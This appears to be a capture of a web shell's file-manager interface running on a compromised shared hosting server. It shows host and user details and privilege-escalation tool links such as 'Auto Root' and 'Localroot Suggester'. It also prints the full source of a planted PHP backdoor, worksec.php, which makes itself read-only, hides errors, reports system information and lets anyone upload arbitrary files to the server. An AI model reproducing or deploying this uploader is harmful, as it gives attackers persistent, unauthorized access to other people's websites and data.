Linux panel555.harmondns.net 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 5.9.79.124 & Your IP : 216.73.216.138
Domains :
Cant Read [ /etc/named.conf ]
User : examacce
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
examacce /
lscache /
5 /
1 /
Delete
Unzip
Name
Size
Permission
Date
Action
1
[ DIR ]
drwxrws---
2026-02-27 22:46
2
[ DIR ]
drwxrws---
2026-02-27 11:38
4
[ DIR ]
drwxrws---
2026-02-23 15:01
5
[ DIR ]
drwxrws---
2026-03-29 01:52
6
[ DIR ]
drwxrws---
2026-02-23 22:58
7
[ DIR ]
drwxrws---
2026-03-29 03:23
8
[ DIR ]
drwxrws---
2026-02-25 13:04
9
[ DIR ]
drwxrws---
2026-02-24 00:59
c
[ DIR ]
drwxrws---
2026-01-23 17:44
d
[ DIR ]
drwxrws---
2026-03-29 14:48
e
[ DIR ]
drwxrws---
2026-02-28 05:53
f
[ DIR ]
drwxrws---
2026-02-27 12:19
worksec.php
1.06
KB
-rw-r--r--
2026-05-05 07:11
Save
Rename
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>